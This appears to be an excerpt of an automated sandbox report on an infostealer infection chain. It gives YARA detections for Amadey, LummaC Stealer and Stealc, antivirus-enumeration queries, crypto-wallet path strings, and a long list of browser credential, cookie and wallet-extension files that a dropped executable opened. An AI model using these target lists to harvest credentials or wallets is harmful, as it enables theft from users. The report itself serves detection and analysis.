                              Source: Seat.com, 00000022.00000003.1626880641.0000000004B37000.00000004.00000800.00020000.00000000.sdmp, Seat.com, 00000022.00000000.1614278825.0000000000E73000.00000002.00000001.01000000.0000001E.sdmp, TradeHub.com, 0000002B.00000000.1645206040.0000000000EB3000.00000002.00000001.01000000.00000021.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                              Source: 2R0700.exe, 00000005.00000002.1210638292.0000000000BB9000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: ~](Program Manager
                              Source: 1E08u3.exe, 1E08u3.exe, 00000002.00000002.944674073.0000000000695000.00000040.00000001.01000000.00000005.sdmpBinary or memory string: JProgram Manager
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeCode function: 17_2_009F2835 cpuid 17_2_009F2835
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeCode function: _Getdateorder,___lc_locale_name_func,__crtGetLocaleInfoEx,17_2_6D627770
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeCode function: __crtGetLocaleInfoEx,GetLocaleInfoEx,?isfx@?$basic_istream@_WU?$char_traits@_W@std@@@std@@QAEXXZ,GetLocaleInfoEx,GetLocaleInfoW,17_2_6D60C160
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10115790101\T0QdO0l.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10115790101\T0QdO0l.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10119590141\ogfNbjS.ps1 VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10121660101\amnew.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10121660101\amnew.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10122730101\bncn6rv.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10122730101\bncn6rv.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeQueries volume information: C:\Users\user\AppData\Local\Temp\4e031b4c VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Users\user\Desktop\mQRr8Rkorf.exeCode function: 0_2_00FA7155 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00FA7155
                              Source: C:\Users\user\Desktop\mQRr8Rkorf.exeCode function: 0_2_00FA2BFB GetVersion,GetModuleHandleW,GetProcAddress,CloseHandle,0_2_00FA2BFB
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                              Source: 2R0700.exe, 00000005.00000003.1127738528.000000000070A000.00000004.00000020.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.1127856691.000000000069D000.00000004.00000020.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.1128700937.000000000070A000.00000004.00000020.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.1127663273.0000000005471000.00000004.00000800.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.1127856691.0000000000679000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                              Source: pwHxMTy.exe, 0000002E.00000002.2023408914.0000000001237000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: amFiles%\Windows Defender\MsMpeng.exe
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                              Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                              Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                              Stealing of Sensitive Information

                              barindex
                              Yara detected Amadey
                              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                              Yara detected Amadeys Clipper DLL
                              Source: Yara matchFile source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000004.00000002.987084215.0000000000711000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000003.00000002.982319426.0000000000711000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000004.00000003.946478690.0000000004E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000002.00000003.904297823.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000009.00000003.1269297866.00000000051D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000003.00000003.941650919.00000000051C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\amnew[1].exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\10121660101\amnew.exe, type: DROPPED
                              Yara detected LummaC Stealer
                              Source: Yara matchFile source: Process Memory Space: 2R0700.exe PID: 5204, type: MEMORYSTR
                              Source: Yara matchFile source: 46.2.pwHxMTy.exe.400000.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 46.2.pwHxMTy.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 45.2.pwHxMTy.exe.4209550.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 5.2.2R0700.exe.980000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0000002E.00000002.2016617729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000002D.00000002.1939541599.0000000004209000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                              Yara detected Stealc
                              Source: Yara matchFile source: dump.pcap, type: PCAP
                              Found many strings related to Crypto-Wallets (likely being stolen)
                              Source: 2R0700.exeString found in binary or memory: Wallets/Electrum-LTC
                              Source: 2R0700.exeString found in binary or memory: %appdata%\ElectronCash\wallets
                              Source: 2R0700.exeString found in binary or memory: Jaxx Liberty
                              Source: 2R0700.exeString found in binary or memory: window-state.json
                              Source: 2R0700.exeString found in binary or memory: %appdata%\Exodus\exodus.wallet
                              Source: 2R0700.exeString found in binary or memory: ExodusWeb3
                              Source: 2R0700.exeString found in binary or memory: %appdata%\Ethereum
                              Source: 2R0700.exeString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                              Source: 2R0700.exe, 00000005.00000003.1097981161.000000000068E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                              Tries to harvest and steal browser information (history, passwords, etc)
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqlite
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.db
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.json
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db
